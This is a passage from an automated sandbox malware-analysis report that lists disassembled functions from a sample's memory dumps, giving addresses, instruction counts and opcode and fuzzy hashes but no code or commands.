                                                                      • Opcode Fuzzy Hash: aa417fc74ac0bde70fe05c144f588d253d7ce5e87ee57c7ff388908da736c9bf
                                                                      • Instruction Fuzzy Hash: B7712A3590D9C94FFB7CFE1888965B837D0FF54391B1402B9D89EC75A2DE28E8068785
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CFF4B Relevance: .2, Instructions: 240COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0865623d8c8e7e6426afa4b1ad29938958ca7788706ac008c0daf2c3f09f5fe2
                                                                      • Instruction ID: 1223efe06cb145e6aa32e3a7bef2b6db58578a2a2cc9e6b6339f5d29971755cb
                                                                      • Opcode Fuzzy Hash: 0865623d8c8e7e6426afa4b1ad29938958ca7788706ac008c0daf2c3f09f5fe2
                                                                      • Instruction Fuzzy Hash: D571A030D1D68E9FEBA9EF6494556BCBBB4FF49380F50057AD00ED7282DE28A842C741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CEEFA Relevance: .2, Instructions: 239COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 31b1bb39015097a0618501e9d3312969576274858aaf5b5a4cd2f59c80e4e3be
                                                                      • Instruction ID: ee37dbf50cd8c23ec04d72ba03ec151277af8312195ec5a731184d47ff305421
                                                                      • Opcode Fuzzy Hash: 31b1bb39015097a0618501e9d3312969576274858aaf5b5a4cd2f59c80e4e3be
                                                                      • Instruction Fuzzy Hash: 3D71D332C0EADA9FEB69EF68D8954F93B70EF12385B1401B7D149CA1D3DE18AC068355
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D574B Relevance: .2, Instructions: 235COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0c4d32f556696be614a20623c8be2fc9ace55695c86171b1f0006bb3ef44b43d
                                                                      • Instruction ID: 627dc268d1fb2a404bd311a212799ebcbfa5d5939893bfd7cd12fe95d25d19a4
                                                                      • Opcode Fuzzy Hash: 0c4d32f556696be614a20623c8be2fc9ace55695c86171b1f0006bb3ef44b43d
                                                                      • Instruction Fuzzy Hash: DD71D130D1DA8ACEEB65EF6484546BDBBB4FF44380F6402BAD40ED7185DE38D9418741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D3471 Relevance: .2, Instructions: 228COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 83d849b178ae446d385cf532a5f066c33af7f1e4fdf75d61af5c7f8b455b6b68
                                                                      • Instruction ID: 5fa0dc5358953e04d988356c84b58763c26bb1aea08a2bdbe15a0e4a8a00b723
                                                                      • Opcode Fuzzy Hash: 83d849b178ae446d385cf532a5f066c33af7f1e4fdf75d61af5c7f8b455b6b68
                                                                      • Instruction Fuzzy Hash: 1881CE3090CB868FEBA9EF18D095571B7A5FF04748B14867DC48BC7A96CA2DF842CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D0AC8 Relevance: .2, Instructions: 227COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 90beff137dec441574e58e7fde09220e6e9c87e12429194a121e1aae7c48471d
                                                                      • Instruction ID: c27ea01aae6ec19b85186ef1aefa28f1d24d978f232cac81aa84b6eccf18fc93
                                                                      • Opcode Fuzzy Hash: 90beff137dec441574e58e7fde09220e6e9c87e12429194a121e1aae7c48471d
                                                                      • Instruction Fuzzy Hash: 5F61A331A0CE4D8FEF68EE68E8559A977E1EF68741F15426AD40DD7292DE30EC41CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CDE2C Relevance: .2, Instructions: 222COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5725d5c3a71bdec624047277653b631cf60e0371f247401f93584c229914e975
                                                                      • Instruction ID: 8dce69c08a04b103c16ac3ecf6a635627544b77ad9b282559ebb7cdd74d1920d
                                                                      • Opcode Fuzzy Hash: 5725d5c3a71bdec624047277653b631cf60e0371f247401f93584c229914e975
                                                                      • Instruction Fuzzy Hash: 3451E53150DB864FE769AF2898855707BE0FF56364B1542BEC08EC72A3D929F847C741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D0EB9 Relevance: .2, Instructions: 216COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 121b18dc521e5d8cad4f759da468f595a1fdb1bab112273bccab4860cf947383
                                                                      • Instruction ID: 59aef4973156da603c5df27b892bae03ef84ce48979d5d62678e850822799587
                                                                      • Opcode Fuzzy Hash: 121b18dc521e5d8cad4f759da468f595a1fdb1bab112273bccab4860cf947383
                                                                      • Instruction Fuzzy Hash: 0451B430A1DE4A8FD768FF289850976B3E1FF683507254279D05EC3686DE28FC428B80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CEF40 Relevance: .2, Instructions: 204COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 231b7846c3c39491186d0cc8c3072106f8e00491a065f6f0ce3e850d6c64e0fc
                                                                      • Instruction ID: a34db060b096b7c6783392b502b3f199bf29445c523bdba5d728bdd8e10d25b9
                                                                      • Opcode Fuzzy Hash: 231b7846c3c39491186d0cc8c3072106f8e00491a065f6f0ce3e850d6c64e0fc
                                                                      • Instruction Fuzzy Hash: 6B51E532C0D6D99FEB69EF68D8954F83B70EF51785B1401B7D14ACA193DE18AC06C351
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CF7A8 Relevance: .2, Instructions: 193COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ae496d850b0cfdad562ffaada6a184fa74e4c7a402720486be69addb9dd2ed3
                                                                      • Instruction ID: 650241b2f0ce5deae05ec716916fdc149aeaadd3a49936e78abeb3f80d4968ec
                                                                      • Opcode Fuzzy Hash: 9ae496d850b0cfdad562ffaada6a184fa74e4c7a402720486be69addb9dd2ed3
                                                                      • Instruction Fuzzy Hash: 96514931E1DECA4FE3A9EE3C68545727BE5FF55390B2582BAD40EC7186DD19A8018340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CEF58 Relevance: .2, Instructions: 192COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 37fa6bed00a548babb6b9c0eb0bef7db3bee75fea969cb814682bf9e0fa0e508
                                                                      • Instruction ID: 20badbde53aebe32795dd623fd3b99689d5d05c9ea1ef3a1c3f411bf4bbc17eb
                                                                      • Opcode Fuzzy Hash: 37fa6bed00a548babb6b9c0eb0bef7db3bee75fea969cb814682bf9e0fa0e508
                                                                      • Instruction Fuzzy Hash: 5751D332C0DADA9FEB69EF68D8954E83B70EF41785B1401B7D14ACB193DE28AC06C751
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CDA4E Relevance: .2, Instructions: 187COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dc810d8764e42eeeaf4d97e06c2e2f78d499e7bd59b90e8725e4df1d2da22d90
                                                                      • Instruction ID: db694aa3a4ee20e0d45462f84efa2e9b49291bd4943acc6b7d90db5fa5030ac0
                                                                      • Opcode Fuzzy Hash: dc810d8764e42eeeaf4d97e06c2e2f78d499e7bd59b90e8725e4df1d2da22d90
                                                                      • Instruction Fuzzy Hash: C561A97090995D9FDFA8EF18C899BA9B7B1FB68340F1501E9D00EE7291CE35A985CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F108D0 Relevance: .2, Instructions: 180COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 68c684316329e72d7aded4b04e168d9bbd7ea9cc2ce7cb6d4dcf8152890f1d9e
                                                                      • Instruction ID: 722dbb641fa091a69ae85b1e986a548aff404e206eb763eb9a1916e4b66c6a92
                                                                      • Opcode Fuzzy Hash: 68c684316329e72d7aded4b04e168d9bbd7ea9cc2ce7cb6d4dcf8152890f1d9e
                                                                      • Instruction Fuzzy Hash: 30518031D196599FDB44FBA8E4956FDBBB0FF48354F04067AD009DB292CF38A8818794
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CC030 Relevance: .2, Instructions: 180COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6165e8209b3da1aeeca7b6279ff60a8925861c7ed48ccd2842b852af213e07a
                                                                      • Instruction ID: 9d5d707601c809ee8881042e39ef6c583bc4b1ea194d8961295cf329d25f179a
                                                                      • Opcode Fuzzy Hash: d6165e8209b3da1aeeca7b6279ff60a8925861c7ed48ccd2842b852af213e07a
                                                                      • Instruction Fuzzy Hash: D951C430D1C5AA8FEBADAB1884657B9B7A1FF55340F1449BEC04EC71C2DE3CA9858B41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CF750 Relevance: .2, Instructions: 176COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4e70e02e4a7d1aaad803be3a4ab77dc98b574b86202fed0f9235269ad805a570
                                                                      • Instruction ID: b8ad835d026521918bc3f1c6e550a1cf236f03f430aa192ec9cf5548af148bdf
                                                                      • Opcode Fuzzy Hash: 4e70e02e4a7d1aaad803be3a4ab77dc98b574b86202fed0f9235269ad805a570
                                                                      • Instruction Fuzzy Hash: 6E41E630E1DA8E4FEBA8EF78A8546BA77E5FF54340F5141BAD01DC3286DE28E8058340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D06C8 Relevance: .2, Instructions: 173COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 60b492fdde599e7cfe63b9fdee591d410c610970af7eaa3fa15b542673f9a408
                                                                      • Instruction ID: aba19fee40e7bd5ed6d91e1b7e1b967a6f07b5242959c1bc67b64441e2bf844e
                                                                      • Opcode Fuzzy Hash: 60b492fdde599e7cfe63b9fdee591d410c610970af7eaa3fa15b542673f9a408
                                                                      • Instruction Fuzzy Hash: 4E514730A1DA4A4FD79CFF2888819B273E5FF99354B2642B9D41DC714BDA29F842C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CE8EC Relevance: .2, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: abd85a135f426b54e9773d2ec0e89c2c402f45074de2cf28b0a745648a209ca3
                                                                      • Instruction ID: d9fb371228a737daa277c82d61532a6136123caecff9424c96b65bea6c986db7
                                                                      • Opcode Fuzzy Hash: abd85a135f426b54e9773d2ec0e89c2c402f45074de2cf28b0a745648a209ca3
                                                                      • Instruction Fuzzy Hash: AA51A830A4895D8FDFA9EF18C898BE877B1FB68301F1041A9D00EE7691DA35AD85CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D0341 Relevance: .1, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1e6b0bf70e41111066d46684b19f0212f8f211eed7ba4c520e6a8a287aacdb1f
                                                                      • Instruction ID: d5be93cfb712ece219d3c32cb063d07ccece32e7aa974b9663d758795f85c24d
                                                                      • Opcode Fuzzy Hash: 1e6b0bf70e41111066d46684b19f0212f8f211eed7ba4c520e6a8a287aacdb1f
                                                                      • Instruction Fuzzy Hash: EA31C021E1DECB4FEBA9EE7C785467567E5EF64380B6582BAC00DD7186DD28EC058380
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C1AF7 Relevance: .1, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a48b6255822497b64425d7a1a244fb2eb871011a1609de8c0f3870084bb024cc
                                                                      • Instruction ID: f58708ee0d3d235b4469cf585663576821acd15e9edec0584e178d91441d9e8f
                                                                      • Opcode Fuzzy Hash: a48b6255822497b64425d7a1a244fb2eb871011a1609de8c0f3870084bb024cc
                                                                      • Instruction Fuzzy Hash: 8A416D31A0C9598FDF98FF28D495DA5B7E1FBA9310B1401BAD10EC3296DE25F885CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D3A97 Relevance: .1, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 36eeb8617adff99b9475324843281e2387424ec8ccf31e3b34c7e99d454c7ce3
                                                                      • Instruction ID: bff386e73c134a0ccf4cb8b45b14bb537a5a3cb13f90ef7ff315f96ab648f85e
                                                                      • Opcode Fuzzy Hash: 36eeb8617adff99b9475324843281e2387424ec8ccf31e3b34c7e99d454c7ce3
                                                                      • Instruction Fuzzy Hash: C4419531A0C9598FDF98EF2CC495DB5B7E1FBA9325B0406A9D10EC3186DF29E845CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CD307 Relevance: .1, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c42e7fa9f0ca6a66060c108e2b2bb19fd3925c4f1be110c2f80ca8dd2c5ed890
                                                                      • Instruction ID: b26550e304d394ceb54031aeee89bd85e2b7824b834c9a1b6f6b39ed37e260d1
                                                                      • Opcode Fuzzy Hash: c42e7fa9f0ca6a66060c108e2b2bb19fd3925c4f1be110c2f80ca8dd2c5ed890
                                                                      • Instruction Fuzzy Hash: 63416F71A0C9499FDF9CEF28D4959B5B3E1FBA9310B0405AAD10EC7592DE24E885CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D3AE2 Relevance: .1, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14e9c3174c6f194e281e00396670db91101453e3694b7aa23ec3cc677662655f
                                                                      • Instruction ID: 8c6360e7933469fbbffda3e374206ca1327a24eccbf3a12576762f8523ecbefd
                                                                      • Opcode Fuzzy Hash: 14e9c3174c6f194e281e00396670db91101453e3694b7aa23ec3cc677662655f
                                                                      • Instruction Fuzzy Hash: 8141D670D08A6D8FDBA9EF18C854BA9B7B5FB58745F1142EAD10DE3291CB346A818F40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C1BA1 Relevance: .1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14edb250a7f86ef286c80eecdd608618d9937f3e9ffe9b0b6c2a3d840e4d7697
                                                                      • Instruction ID: 227d98ea7ec1e67776cc8a1e27fa13525d7174971aacaa879ae8be8acc13984c
                                                                      • Opcode Fuzzy Hash: 14edb250a7f86ef286c80eecdd608618d9937f3e9ffe9b0b6c2a3d840e4d7697
                                                                      • Instruction Fuzzy Hash: 2231AD31A0C9558FCB98FF28C495EA477E1FBA9310B1402B9D40EC7296DE28F885CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D3B41 Relevance: .1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7bb19db4ce62e3cb81739f4433166c4410cb5b6571832d38fef9ee01a47578b3
                                                                      • Instruction ID: 29ca7165d0004ff84b37dff3883b4c477508570653099de7fcfd7ff77dfca707
                                                                      • Opcode Fuzzy Hash: 7bb19db4ce62e3cb81739f4433166c4410cb5b6571832d38fef9ee01a47578b3
                                                                      • Instruction Fuzzy Hash: 4431B131A0C9558FDF98EF2CC4A5EB477E1FBA9314B0406ADD10EC7296CE28E844CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F10998 Relevance: .1, Instructions: 117COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: abc358b9738535296065fde62e6dfd28460213a54bf5ab7f61bdb04b15c2143f
                                                                      • Instruction ID: 2d9249ef5f9815c89b8a398c66e91d85a159bbdedb018288a94978f22c4d3a4f
                                                                      • Opcode Fuzzy Hash: abc358b9738535296065fde62e6dfd28460213a54bf5ab7f61bdb04b15c2143f
                                                                      • Instruction Fuzzy Hash: 73412B70D1895D8FDB84EFA8D495AEDBBF1FF58341F00017AE409E3295CB34A8418B84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C1B3B Relevance: .1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b820528400ce2fed77dcc16c20dc7db825118f0ce150f31cc425948f6405b4dc
                                                                      • Instruction ID: 1cb45db98b1ec1e40be61f24ee825483c49541366ad7c3d34971b2d7fdd6a3e2
                                                                      • Opcode Fuzzy Hash: b820528400ce2fed77dcc16c20dc7db825118f0ce150f31cc425948f6405b4dc
                                                                      • Instruction Fuzzy Hash: 88316D3160C9498FDB98FF28D495DA577E1FBA9310B1405B9D10EC7296DE28F885CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D3ADB Relevance: .1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a6ec746e36592cf9029c8da4c1f7bcb7dc6229ad30c03c4979aca1c0d50afa91
                                                                      • Instruction ID: d2053f1dbe133bfcf6fcb484a764e68ffc6237c1f213f39c1cf43b72be8dacaa
                                                                      • Opcode Fuzzy Hash: a6ec746e36592cf9029c8da4c1f7bcb7dc6229ad30c03c4979aca1c0d50afa91
                                                                      • Instruction Fuzzy Hash: 9A31A23160C9498FDF98EF2CC4A5EB577E1FBA9314B0406A9D10EC7296DF28E845CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CD34B Relevance: .1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af766dfd8ed9c7628f1ba37c30b68353f2444841e004c9e3dc2dac1021b4b8d7
                                                                      • Instruction ID: 3d03d78964a7f280005f3adc0bd6924dceae3906c62e17e96c452a80da5946ac
                                                                      • Opcode Fuzzy Hash: af766dfd8ed9c7628f1ba37c30b68353f2444841e004c9e3dc2dac1021b4b8d7
                                                                      • Instruction Fuzzy Hash: F231617160C9499FDF9CEF28C095DB5B3E1FBA9310B0405AED10AD7592DE28F885CB81
                                                                      Uniqueness

